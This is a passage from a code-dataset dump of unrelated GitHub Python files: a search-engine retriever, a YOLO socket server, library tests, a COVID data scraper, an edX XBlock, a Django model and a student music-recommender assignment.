+= q_vector[i] * d_vector[i]\n \n return dot_prod\n\n\"\"\"\nAlgorithm:\n 1) Parse query terms and stem them\n 2) Use alphabetical seek positions of index.txt to find terms quickly\n 3) Calculate query ltc and normalize the weight\n 4) Calculate the cosine similarity of query ltc and document lnc\nReturns a dictionary of documents and their cosine similarity score with the query\n\"\"\"\ndef query(query_string) -> defaultdict(list):\n stemmer = PorterStemmer()\n query_terms = [stemmer.stem(query) for query in re.sub(r'[^a-zA-Z0-9]', ' ', query_string.lower()).split() if len(stemmer.stem(query)) > 2] # stem the query and make sure its length is > 2\n relevance = defaultdict(list)\n query_vector = list()\n normalization = 0\n \n with open(\"index.txt\", \"r\") as f:\n for term in query_terms:\n f.seek(seek_dict[term[0]]) # find file position where query is close by starting at the same alphanumeric position in the index\n line = f.readline()\n \n while (line.split(\" | \")[0] != term):\n if (line.split(\" | \")[0] > term): # if term found in index > query_term, there is no point iterating further \n return relevance # and we will not find the term in the index; continue onto next query_term\n line = f.readline()\n \n\n \n parsed_line = line.split(\" | \")\n term_idf = (1 + math.log(query_terms.count(term))) * math.log(55393/len(parsed_line[1].split())) # calculate each query term's idf\n query_vector.append(term_idf) # vector representation of query with idf (not normalized yet)\n normalization += term_idf ** 2 # keeping track of normalization factor to correctly normalize query vector weight\n \n for posting in parsed_line[1].split():\n doc, score = posting.split(\"#\")\n \n if (\"!\" in doc):\n doc = doc[:-1]\n \n relevance[int(doc)].append(float(score)) # dictionary of all relevant documents containing at least a part of the query term, where key = term and value = normalized lnc\n\n # return a dictionary comprehension where we find the cosine similarity of ltc (normalized query vector) \n # and lnc (normalized document vector) only if they have equal dimensions\n # key = doc_id, value = lnc.ltc ranking based on cosine similarity\n return {key : cosine([dimension / math.sqrt(normalization) for dimension in query_vector], value) for key, value in relevance.items() if len(value) == len(query_vector)} \n\n\"\"\"\nOutputs the results of a query, ordered by cosine similarity\n\"\"\"\ndef print_urls(query_results, display = 10):\n unique_urls = set()\n for i, (doc, score) in enumerate(sorted(query_results.items(), key=lambda x:x[1], reverse=True)):\n with open(\"document_map.txt\") as f:\n line = next(islice(f, doc, doc + 1)).split(\" \")[1].strip() # go to exact line in document_map.txt to find URL\n if (urldefrag(line)[0] not in unique_urls): # duplicate detection, URL might not be unique after we defrag it so we do not output non-unique URLs\n unique_urls.add(urldefrag(line)[0])\n print(\"{}\".format(urldefrag(line)[0]))\n \n if (i >= display - 1): # display only top 10 results or custom amount of results\n break\n \nif __name__ == \"__main__\":\n load_seek_dict()\n\n while (True):\n q = input(\"Enter a search query (or enter !q to quit): \")\n q = q.lower().strip()\n \n if (q == \"!q\"):\n break\n \n start = time.time()\n results = query(q)\n end = time.time()\n print(\"Found {} results for query '{}' in {:.3f} ms\\n\".format(len(results), q, (end - start) * 1000)) \n \n if (len(results) == 0):\n continue \n else:\n display = input(\"How many results would you like to see? 
(press Enter to see default = 10 results): \")\n \n if (display == \"\"):\n print()\n print_urls(results)\n else:\n try:\n display = float(display)\n print_urls(results, display)\n except ValueError:\n print(\"Incorrect format detected; showing default = up to 10 results.\\n\")\n print_urls(results)\n \n print()\n \n \n ","repo_name":"jcvong/search-engine","sub_path":"src/retriever.py","file_name":"retriever.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8946016187","text":"#!/usr/bin/env python3\n# vi: set shiftwidth=4 tabstop=8 expandtab:\nimport numpy as np\nimport cv2 as cv\nimport socket\nimport torch\n\nHOST = \"127.0.0.1\" # Standard loopback interface address (localhost)\nPORT = 10000 # Port to listen on (non-privileged ports are > 1023)\n\nb_imagen = bytearray()\n\n# Model\nmodel = torch.hub.load('ultralytics/yolov5', 'yolov5s')\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n s.listen()\n while True:\n conn, addr = s.accept()\n # Limpiamos el arreglo\n b_imagen.clear()\n with conn:\n # recivimos los primeros bytes\n data = conn.recv(4096)\n img_size = int.from_bytes(data[:4], byteorder=\"little\")\n b_imagen += data[4:]\n print(f\"Connected by {addr}, size:\", img_size)\n while len(b_imagen) < img_size:\n data = conn.recv(4096)\n b_imagen += data\n if not data:\n print(\"break\")\n break\n\n print(\"ok\", len(b_imagen))\n\n # Los bytes los hacemos arreglo de numpy\n img_enc = np.ndarray(shape=(len(b_imagen),), dtype='uint8',\n buffer=b_imagen, )\n\n # Convertimos la imagen JPG a imagen RAW\n color = cv.imdecode(img_enc, cv.IMREAD_COLOR)\n\n # Inference\n results = model(color)\n ret = results.pandas().xyxy[0].to_json(orient=\"records\")\n conn.sendall(ret.encode())\n","repo_name":"miguelinux/materia-celn","sub_path":"scripts/imagen-compressed-torch-server.py","file_name":"imagen-compressed-torch-server.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43250346190","text":"from django.test import TestCase\n\nfrom patchwork.models import Comment\n\nNOT_TAGS = \\\n\"\"\"\nHey, hi, hello\n\nmessage\n\nNonsense-by: zzz\n\"\"\"\n\nTAGS = \\\n\"\"\"\nReviewed-by: aaa\nFixes: foo\nSigned-off-by: bbb\nAcked-by: bar\nTested-by: ccc\nNacked-by: baz\nReported-by: ddd\n\"\"\"\n\n\nclass CommentTest(TestCase):\n def testPatchResponse(self):\n comment = Comment()\n comment.content = NOT_TAGS + TAGS\n\n reference_tags = TAGS.split()\n actual_tags = comment.patch_responses().split()\n\n self.assertListEqual(sorted(reference_tags), sorted(actual_tags))\n","repo_name":"dlespiau/patchwork","sub_path":"patchwork/tests/test_comment.py","file_name":"test_comment.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"60"} +{"seq_id":"31436551974","text":"__copyright__ = \"Copyright (C) 2020 Sotiris Niarchos\"\n\n__license__ = \"\"\"\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following 
conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\"\"\"\n\nimport numpy as np\n\nimport pyopencl as cl\nimport pyopencl.cltypes as cltypes\nimport pyopencl.tools as cl_tools\nfrom pyopencl import mem_flags\nfrom pyopencl.tools import ( # noqa: F401\n pytest_generate_tests_for_pyopencl as pytest_generate_tests)\n\n\ndef test_struct_with_array_fields(ctx_factory):\n #\n # typedef struct {\n # uint x[2];\n # float y;\n # uint z[3][4];\n # } my_struct;\n #\n cl_ctx = ctx_factory()\n device = cl_ctx.devices[0]\n queue = cl.CommandQueue(cl_ctx)\n\n my_struct = np.dtype([\n (\"x\", cltypes.uint, 2),\n (\"y\", cltypes.int),\n (\"z\", cltypes.uint, (3, 4))\n ])\n my_struct, cdecl = cl_tools.match_dtype_to_c_struct(\n device, \"my_struct\", my_struct\n )\n\n # a random buffer of 4 structs\n my_struct_arr = np.array([\n ([81, 24], -57, [[15, 28, 45, 7], [71, 95, 65, 84], [2, 11, 59, 9]]),\n ([5, 20], 47, [[15, 53, 7, 59], [73, 22, 27, 86], [59, 6, 39, 49]]),\n ([11, 99], -32, [[73, 83, 4, 65], [19, 21, 22, 27], [1, 55, 6, 64]]),\n ([57, 38], -54, [[74, 90, 38, 67], [77, 30, 99, 18], [91, 3, 63, 67]])\n ], dtype=my_struct)\n\n expected_res = []\n for x in my_struct_arr:\n expected_res.append(int(np.sum(x[0]) + x[1] + np.sum(x[2])))\n expected_res = np.array(expected_res, dtype=cltypes.int)\n\n kernel_src = \"\"\"%s\n // this kernel sums every number contained in each struct\n __kernel void array_structs(__global my_struct *structs, __global int *res) {\n int i = get_global_id(0);\n my_struct s = structs[i];\n res[i] = s.x[0] + s.x[1] + s.y;\n for (int r = 0; r < 3; r++)\n for (int c = 0; c < 4; c++)\n res[i] += s.z[r][c];\n }\"\"\" % cdecl\n\n mem_flags1 = mem_flags.READ_ONLY | mem_flags.COPY_HOST_PTR\n mem_flags2 = mem_flags.WRITE_ONLY\n\n my_struct_buf = cl.Buffer(cl_ctx, mem_flags1, hostbuf=my_struct_arr)\n res_buf = cl.Buffer(cl_ctx, mem_flags2, size=expected_res.nbytes)\n\n program = cl.Program(cl_ctx, kernel_src).build()\n kernel = program.array_structs\n kernel(queue, (4,), None, my_struct_buf, res_buf)\n\n res = np.empty_like(expected_res)\n cl.enqueue_copy(queue, res, res_buf)\n\n assert (res == expected_res).all()\n\n\nif __name__ == \"__main__\":\n import sys\n if len(sys.argv) > 1:\n exec(sys.argv[1])\n else:\n from pytest import main\n main([__file__])\n","repo_name":"inducer/pyopencl","sub_path":"test/test_arrays_in_structs.py","file_name":"test_arrays_in_structs.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":998,"dataset":"github-code","pt":"60"} +{"seq_id":"6246079415","text":"import requests, openpyxl, io, csv, datetime\nimport county_report, state_report\n\nSTATE_ABBR = 'IN'\nSTATE = 'Indiana'\nURL = 'https://hub.mph.in.gov/dataset/89cfa2e3-3319-4d31-a60d-710f76856588/resource/8b8e6cd7-ede2-4c41-a9bd-4266df783145/download/covid_report_county.xlsx'\n\ndef scraper():\n # make an HTTP web request to get the file\n response = requests.get(URL)\n\n if response.status_code 
== requests.codes.ok:\n # Success - print to the console that the HTTP request succeeeded\n print(' ', STATE_ABBR, ': Downloaded succeeded')\n\n data = io.BytesIO(response.content)\n\n wb = openpyxl.load_workbook(filename=data, read_only=True, data_only=True)\n \n sheet = wb.worksheets[0]\n\n counties = []\n\n for i in range(2, 94):\n rowCount = str(i)\n \n county = sheet['E' + rowCount].value\n confirmed = sheet['B' + rowCount].value\n deaths = sheet['C' + rowCount].value\n \n county = county_report.CountyReport(STATE, county, (int)(confirmed), (int)(deaths), -1, -1, datetime.datetime.now())\n counties.append(county) # append the countyReport to our list of counties\n\n # print the number of counties we processed\n print(' ', STATE_ABBR, ':', len(counties), ' counties processed OK')\n\n # build the state-level report object that will include all of the counties\n stateReport = state_report.StateReport(STATE, STATE_ABBR, counties, datetime.datetime.now())\n \n # return the state-level report\n return stateReport\n \n\n else:\n # Fail\n print(' ', STATE_ABBR, ': ERROR : Web download failed - HTTP status code ', response.status_code)","repo_name":"erik1066/covid-web-scraper","sub_path":"src/in_scraper.py","file_name":"in_scraper.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"26673885454","text":"\"\"\" Module that monkey-patches json module when it's imported so\nJSONEncoder.default() automatically checks for a special \"to_json()\"\nmethod and uses it to encode the object if found.\n\"\"\"\nfrom lib.Storage import Storage\nimport utility as ServerUtil\nfrom connexion_plus import App, MultipleResourceResolver, Util\nfrom RDS import Util as CommonUtil\n\nimport logging, os\n\nlog_level = os.environ.get(\"LOGLEVEL\", \"DEBUG\")\nlogger = logging.getLogger(\"\")\nlogging.getLogger(\"\").handlers = []\nlogging.basicConfig(format=\"%(asctime)s %(message)s\", level=log_level)\n\n\ndef bootstrap(name=\"MicroService\", testing=False, *args, **kwargs):\n list_openapi = Util.load_oai(\"central-service_token-storage.yml\")\n\n app = App(name, *args, **kwargs)\n\n opts = {\n \"use_in_memory_on_failure\": (\n os.getenv(\"use_inmemory_as_fallover\", \"False\").capitalize() == \"True\"\n )\n }\n if testing:\n app.app.config.update({\"TESTING\": True})\n opts = {\"use_in_memory_on_failure\": True}\n\n CommonUtil.monkeypatch(app=app.app)\n\n ServerUtil.storage = Storage(**opts)\n\n for oai in list_openapi:\n app.add_api(\n oai,\n resolver=MultipleResourceResolver(\"api\", collection_endpoint_name=\"index\"),\n validate_responses=True,\n )\n\n\n return app\n","repo_name":"Sciebo-RDS/Sciebo-RDS","sub_path":"RDS/layer3_central_services/token_storage/src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"60"} +{"seq_id":"6541554399","text":"# pylint: disable=import-error\n''' Review XBlock '''\n\nfrom __future__ import absolute_import\nimport logging\n\nimport pkg_resources\n\nfrom six.moves import range\n\nfrom xblock.core import XBlock\nfrom xblock.fields import Integer, Scope, String\nfrom xblock.fragment import Fragment\nfrom xblockutils.resources import ResourceLoader\n\nfrom .configuration import SHOW_PROBLEMS, SHOW_VERTICAL\nfrom .get_review_ids import get_problems, get_vertical\n\nlog = logging.getLogger(__name__)\nloader = ResourceLoader(__name__)\n\n\n# Make '_' a no-op so 
we can scrape strings. Using below function instead of\n# `django.utils.translation.ugettext_noop` because Django cannot be imported in this file\ndef _(text):\n return text\n\n\n@XBlock.needs('i18n')\nclass ReviewXBlock(XBlock):\n '''\n The Review XBlock helps learners review concepts from a course by redisplaying\n a handful of problems from the course with a fresh state that are ungraded and\n have unlimited attempts.\n '''\n display_name = String(\n display_name=_('Display Name'),\n help=_('The display name for this component.'),\n scope=Scope.settings,\n default=_('Review'),\n )\n\n num_desired = Integer(\n display_name=_('Number of desired review problems'),\n help=_('Defines the number of problems the review module will display '\n 'to the learner. You do not need this if displaying a full unit.'),\n default=5,\n values={\"min\": 2},\n scope=Scope.content\n )\n\n def resource_string(self, path):\n '''Handy helper for getting resources from our kit.'''\n data = pkg_resources.resource_string(__name__, path)\n return data.decode('utf8')\n\n def get_problem_html(self):\n '''\n Create the html for showing review problems by picking individual\n problems. This calls the get_problems function which will return\n self.num_desired urls to display in iFrames for the Review XBlock.\n '''\n # url_list elements have the form (url, correctness, attempts)\n url_list = get_problems(self.num_desired, self.course_id)\n if len(url_list) == self.num_desired:\n review_context_dict = {'number_desired': self.num_desired}\n template = loader.render_django_template('/templates/review.html', review_context_dict)\n # Want to wrap all of the problems inside of a div\n template += '
    \\n'\n\n for i in range(self.num_desired):\n problem_url, correctness, num_attempts = url_list[i]\n prob_context_dict = {\n 'problem_url': problem_url,\n 'correctness': correctness,\n 'num_attempts': num_attempts,\n 'index': i+1\n }\n template += loader.render_django_template('/templates/review_content_problem.html', prob_context_dict)\n template += '
    '\n return template\n return ''\n\n def get_vertical_html(self):\n '''\n Create the html for showing review problems by picking a single unit\n to show to a learner (which will contain 1 or more problems). This\n calls the get_vertical function which will return a single url to\n display in an iFrame for the Review XBlock.\n '''\n vertical_url = get_vertical(self.course_id)\n if vertical_url:\n review_context_dict = {'number_desired': 'some'}\n template = loader.render_django_template('/templates/review.html', review_context_dict)\n # Want to wrap all of the problems inside of a div\n template += '
    \\n'\n vert_context_dict = {'vertical_url': vertical_url}\n template += loader.render_django_template('/templates/review_content_vertical.html', vert_context_dict)\n template += '
    '\n return template\n return ''\n\n def student_view(self, context=None): # pylint: disable=unused-argument\n '''\n The primary view of the ReviewXBlock, shown to students\n when viewing courses.\n '''\n html = ''\n if str(self.course_id) in SHOW_PROBLEMS:\n html = self.get_problem_html()\n elif str(self.course_id) in SHOW_VERTICAL:\n html = self.get_vertical_html()\n if not html:\n # Default html if no problems or vertical are shown\n html = loader.render_django_template('/templates/no_review.html')\n frag = Fragment(html)\n frag.add_css(self.resource_string('static/css/review.css'))\n frag.add_javascript(self.resource_string('static/js/src/review.js'))\n frag.initialize_js('ReviewXBlock')\n return frag\n\n def studio_view(self, context):\n '''\n The view of the ReviewXBlock shown to course teams when they access\n the XBlock in studio.\n '''\n return self.student_view(context)\n","repo_name":"edx-unsupported/xblock-review","sub_path":"review/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"37308553137","text":"from django.db import models\nfrom django.conf import settings\n\nfrom .managers import BridgeManager\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass Bridge(models.Model):\n height = models.DecimalField(\n _('bridge height'),\n max_digits=4,\n decimal_places=2,\n blank=True,\n null=True,\n )\n width = models.DecimalField(\n _('bridge width'),\n max_digits=4,\n decimal_places=2,\n blank=True,\n null=True,\n )\n latitude_north = models.DecimalField(\n _('bounding box north latitude'),\n max_digits=10,\n decimal_places=7,\n )\n latitude_south = models.DecimalField(\n _('bounding box south latitude'),\n max_digits=10,\n decimal_places=7,\n )\n longitude_west = models.DecimalField(\n _('bounding box west longitude'),\n max_digits=10,\n decimal_places=7,\n )\n longitude_east = models.DecimalField(\n _('bounding box east longitude'),\n max_digits=10,\n decimal_places=7,\n )\n latitude = models.DecimalField(\n _('bounding box center latitude'),\n max_digits=10,\n decimal_places=7,\n )\n longitude = models.DecimalField(\n _('bounding box center longitude'),\n max_digits=10,\n decimal_places=7,\n )\n created_date = models.DateTimeField(\n _('date of creation'),\n auto_now_add=True,\n )\n last_update = models.DateTimeField(\n _('date of last update'),\n auto_now=True,\n )\n contributors = models.ManyToManyField(\n settings.AUTH_USER_MODEL,\n verbose_name=_('bridge contributors'),\n related_name=\"bridges\",\n through='BridgeUpdate',\n )\n\n objects = BridgeManager()\n\n class Meta:\n verbose_name = _(\"bridge\")\n verbose_name_plural = _(\"bridges\")\n\n def __str__(self):\n return f\"({self.latitude:.7f}, {self.longitude:.7f})\"\n\n @property\n def bbox(self):\n \"\"\"Dictionary representation of the bounding box.\"\"\"\n return [\n self.longitude_west,\n self.latitude_south,\n self.longitude_east,\n self.latitude_north,\n ]\n\n @bbox.setter\n def bbox(self, values):\n self.longitude_west = values[0]\n self.latitude_south = values[1]\n self.longitude_east = values[2]\n self.latitude_north = values[3]\n\n @property\n def bbox_string(self):\n \"\"\"String representation of the bounding box.\"\"\"\n return (\n f\"bbox:{self.longitude_west:.7f},{self.latitude_south:.7f},\"\n f\"{self.longitude_east:.7f},{self.latitude_north:.7f}\"\n )\n\n\nclass BridgeUpdate(models.Model):\n contributor = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n 
verbose_name=_('update contributor'),\n on_delete=models.CASCADE,\n related_name=\"bridge_updates\",\n )\n bridge = models.ForeignKey(\n 'Bridge',\n verbose_name=_('updated bridge'),\n on_delete=models.CASCADE,\n related_name=\"bridge_updates\",\n )\n updated_date = models.DateTimeField(auto_now_add=True)\n","repo_name":"jerem33620/jeremy_p13","sub_path":"bridges/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18764115304","text":"'''\r\nHomework10MusicRecommender\r\nName: Timothy Stephens,Rachael Kondrat\r\nDate: April 14, 2020\r\nPledge: We pledge our honor that we have abided by the Stevens Honor System.\r\n'''\r\n\r\n# a very complex music recommender system ;-;\r\n\r\nfrom cs115 import *\r\n\r\nPREF_FILE = 'musicrecplus_ex2_b.txt'\r\n\r\n\r\ndef loadUsers(fileName):\r\n ''' Reads in a file of stored users' preferences\r\n stored in the file 'fileName'.\r\n Returns a dictionary containing a mapping\r\n of user names to a list preferred artists\r\n '''\r\n try:\r\n file = open(fileName, 'r')\r\n userDict={}\r\n for line in file:\r\n # Read and parse a single line\r\n [userName, bands] = line.strip().split(\":\")\r\n bandList = bands.split(\",\")\r\n bandList.sort()\r\n userDict[userName] = bandList\r\n file.close()\r\n return userDict\r\n except FileNotFoundError:\r\n userDict={}\r\n return userDict\r\n \r\n\r\ndef EnterPreferences(userName, userMap):\r\n ''' Allows user to enter preferences. Returns user to menu promptly after. '''\r\n newPref = \"\"\r\n prefs = []\r\n newPref = input(\"Enter an artist that you like (Enter to finish): \")\r\n while newPref != \"\":\r\n prefs.append(newPref.strip().title())\r\n newPref = input('Please enter another artist or band that you like or just press Enter to see Menu:')\r\n prefs.sort()\r\n userMap[userName] = prefs\r\n return userMap\r\n \r\n#figure out how to get back to menu!!!\r\n\r\n\r\n\r\ndef getRecommendations(userName, prefs, userMap): #some error i forgot\r\n '''Gets recommendations for a user (userName) based\r\n on the users in userMap (a dictionary) and the user's\r\n preferences in pref (a list). 
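Worked example (hypothetical data): if prefs is ['Adele'] and the closest other user's list is ['Adele', 'Muse'], findBestUser picks that user and drop() leaves ['Muse'] as the recommendation.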
Returns a list of recommended\r\n artists.'''\r\n bestUser = findBestUser(userName, prefs, userMap)\r\n if len(bestUser) == 0:\r\n print(\"No recommendations available at this time.\")\r\n recommendations = []\r\n for user in bestUser:\r\n recs = drop(prefs,userMap[user])\r\n if recommendations == []:\r\n recommendations = recs\r\n else:\r\n recommendations.extend(recs)\r\n finalRec = recommendations\r\n finalRec.sort()\r\n print(*finalRec, sep = \"\\n\")\r\n return finalRec\r\n\r\n\r\ndef findBestUser(userName, prefs, userMap):\r\n '''Find the users whose tastes are closest to the current user.\r\n Return the best users (a list of names).'''\r\n bestUser = []\r\n bestScore = -1\r\n maxScore = len(prefs)\r\n for user in userMap.keys():\r\n if '$' in user:\r\n continue\r\n newprefs = userMap[user]\r\n score = numMatches(prefs, newprefs)\r\n if score == 0:\r\n continue\r\n if maxScore == score:\r\n continue\r\n if score > bestScore and userName != user:\r\n bestScore = score\r\n bestUser = [user]\r\n if score == bestScore and userName != user and user not in bestUser:\r\n bestUser.append(user)\r\n return bestUser\r\n\r\n\r\n\r\ndef drop(list1, list2):\r\n '''Return a new list that contains only the elements in\r\n list2 that were NOT in list1.'''\r\n\r\n list3 = []\r\n i = 0\r\n j = 0\r\n while i < len(list1) and j < len(list2):\r\n if list1[i] == list2[j]:\r\n i += 1\r\n j += 1\r\n elif list1[i] < list2[j]:\r\n i += 1\r\n else:\r\n list3.append(list2[j])\r\n j += 1\r\n # add the rest of list2 if there's anything left\r\n while j < len(list2):\r\n list3.append(list2[j])\r\n j += 1\r\n\r\n return list3\r\n\r\ndef numMatches(list1, list2):\r\n '''return the number of elements that match between\r\n two sorted lists'''\r\n matches = 0\r\n i = 0\r\n j = 0\r\n while i < len(list1) and j < len(list2):\r\n if list1[i] == list2[j]:\r\n matches += 1\r\n i += 1\r\n j += 1\r\n elif list1[i] < list2[j]:\r\n i += 1\r\n else:\r\n j += 1\r\n return matches\r\n\r\ndef mostPopular():\r\n '''print the artist that is liked by the most users.\r\n if there is a tie, print all artists with the most likes'''\r\n userList = []\r\n memo = loadUsers(PREF_FILE)\r\n\r\n newUserList = []\r\n artistList = []\r\n\r\n likeList = []\r\n mostLikes = 0\r\n mostPopular = []\r\n\r\n finalList = []\r\n \r\n #load into userList the list of users\r\n for users in memo.keys():\r\n userList.append(users)\r\n \r\n #first exclude users with a $\r\n for i in userList:\r\n if i[len(i)-1] != '$' and len(i) != 0:\r\n newUserList += [i]\r\n\r\n #second make a list of artists w/o users\r\n # i am comparing newUserList to the base list, since that has the artists\r\n #then adding the artists not attached to a private user to artistList\r\n for users in newUserList:\r\n if users in memo:\r\n artistList += memo[users]\r\n\r\n #next get the number of likes into a list w/ the artist\r\n #the list will have [artist, likes]; look for an existing entry first and\r\n #only append a new one when the artist is not in likeList yet\r\n for artists in artistList:\r\n for item in likeList:\r\n if artists == item[0]: #item[0] is the artist\r\n item[1] +=1 #item[1] is the like number\r\n break\r\n else:\r\n likeList += [[artists,1]]\r\n \r\n #sort through likeList to find the artist with the most likes\r\n for term in likeList:\r\n if term[1] == mostLikes:\r\n mostPopular += [term[0]]\r\n mostPopular.sort()\r\n if term[1] > mostLikes:\r\n mostPopular = [term[0]]\r\n mostPopular.sort()\r\n mostLikes = term[1]\r\n \r\n #return the most popular artists\r\n #also account for if there are not top artists\r\n if 
len(mostPopular) == 0:\r\n print('Sorry no artists found')\r\n else:\r\n for item in mostPopular:\r\n print(item)\r\n \r\n \r\ndef howPopular():\r\n '''returns the number of likes the most popular artists received'''\r\n \r\n #I just copied mostPopular's bookkeeping to get a list w/ [artist,likes]\r\n userList = []\r\n memo = loadUsers(PREF_FILE)\r\n\r\n newUserList = []\r\n artistList = []\r\n\r\n likeList = []\r\n mostLikes = 0\r\n mostPopular = []\r\n \r\n \r\n #load into userList the list of users\r\n for users in memo.keys():\r\n userList.append(users)\r\n \r\n #first exclude users with a $\r\n for i in userList:\r\n if i[len(i)-1] != '$' and len(i) != 0:\r\n newUserList += [i]\r\n\r\n #second make a list of artists w/o users\r\n # i am comparing newUserList to the base list, since that has the artists\r\n #then adding the artists not attached to a private user to artistList\r\n for users in newUserList:\r\n if users in memo:\r\n artistList += memo[users]\r\n\r\n #next get the number of likes into a list w/ the artist\r\n #the list will have [artist, likes]; same fixed lookup as in mostPopular\r\n for artists in artistList:\r\n for item in likeList:\r\n if artists == item[0]: #item[0] is the artist\r\n item[1] +=1 #item[1] is the like number\r\n break\r\n else:\r\n likeList += [[artists,1]]\r\n \r\n #artists with the most likes\r\n for item in likeList:\r\n if item[1] > mostLikes:\r\n mostLikes = item[1]\r\n\r\n if mostLikes == 0:\r\n print('Sorry no artists found')\r\n else:\r\n print(mostLikes)\r\n\r\n\r\ndef RunPreferences(userName, userMap):\r\n if userName in userMap:\r\n prefs = userMap[userName]\r\n return prefs\r\n else:\r\n prefs = []\r\n print('I see that you are a new user')\r\n newPref = input('Please enter the name of an artist you like: ')\r\n while newPref != '':\r\n prefs.append(newPref.strip().title())\r\n newPref = input('Please enter another artist or band that you like or just press Enter to see Menu:')\r\n prefs.sort()\r\n userMap[userName] = prefs\r\n return prefs\r\n\r\n\r\ndef MostLikes(userMap):\r\n '''Finds and returns the user/users with the highest number of preferred\r\n artists.'''\r\n XuserMap = list(filter(lambda x:'$' not in x, userMap.keys())) #filters out private ($) users; list() so it can be indexed and reused\r\n if len(XuserMap) == 0:\r\n print('Sorry no user found.')\r\n return\r\n TopUser = [XuserMap[0]] #takes first user as base case\r\n for user in XuserMap:\r\n if len(userMap[user]) > len(userMap[TopUser[0]]): #replaces TopUser if more\r\n TopUser = [user]\r\n if len(userMap[user]) == len(userMap[TopUser[0]]) and user != TopUser[0]: #joins TopUser if equal\r\n TopUser.append(user)\r\n TopUser.sort()\r\n print(\"\\n\".join(TopUser)) #prints the TopUser/users on individual lines\r\n\r\n\r\n\r\ndef Quit(userName, userMap, fileName):\r\n '''Saves changes made to the file's content and safely exits the program.'''\r\n try:\r\n file = open(fileName, 'w')\r\n for user in userMap:\r\n toSave = str(user) + ':' + ','.join(userMap[user]) + '\\n'\r\n file.write(toSave)\r\n file.close()\r\n except FileNotFoundError:\r\n file = open(fileName, 'w+')\r\n for user in userMap:\r\n toSave = str(user) + ':' + ','.join(userMap[user]) + '\\n'\r\n file.write(toSave)\r\n file.close()\r\n \r\n \r\ndef main():\r\n ''' The main recommendation function '''\r\n\r\n #STARTING CODE SHOULD RUN BEFORE MAIN\r\n userMap = loadUsers(PREF_FILE)\r\n print('Welcome to the music recommender')\r\n userName = input('Please enter your name ( put a $ symbol after your name if 
you wish your preferences to remain private ): ')\r\n prefs = RunPreferences(userName, userMap)\r\n \r\n menuLoop = True\r\n while menuLoop == True:\r\n option = input('\\n Enter a letter to choose an option :' '\\n'\r\n 'e - Enter preferences' '\\n'\r\n 'r - Get recommendations' '\\n'\r\n 'p - Show most popular artists' '\\n'\r\n 'h - How popular is the most popular' '\\n'\r\n 'm - Which user has the most likes' '\\n'\r\n 'q - Save and quit' '\\n ')\r\n if option == 'e':\r\n userMap = EnterPreferences(userName, userMap) #EnterPreferences returns the updated map, not a preference list\r\n prefs = userMap[userName]\r\n elif option == 'r':\r\n Recs = getRecommendations(userName, prefs, userMap)\r\n elif option == 'p':\r\n MVPs = mostPopular()\r\n elif option == 'h':\r\n MVPsCount = howPopular()\r\n elif option == 'm':\r\n SpotifyCamper = MostLikes(userMap)\r\n elif option == 'q':\r\n Terminator = Quit(userName, userMap, PREF_FILE)\r\n break\r\n\r\nif __name__ == \"__main__\": main()\r\n\r\n\r\n\r\n","repo_name":"redstarkeT/CS-115-Assignments","sub_path":"CS 115 Assignments/musicrecplus.py","file_name":"musicrecplus.py","file_ext":"py","file_size_in_byte":10760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
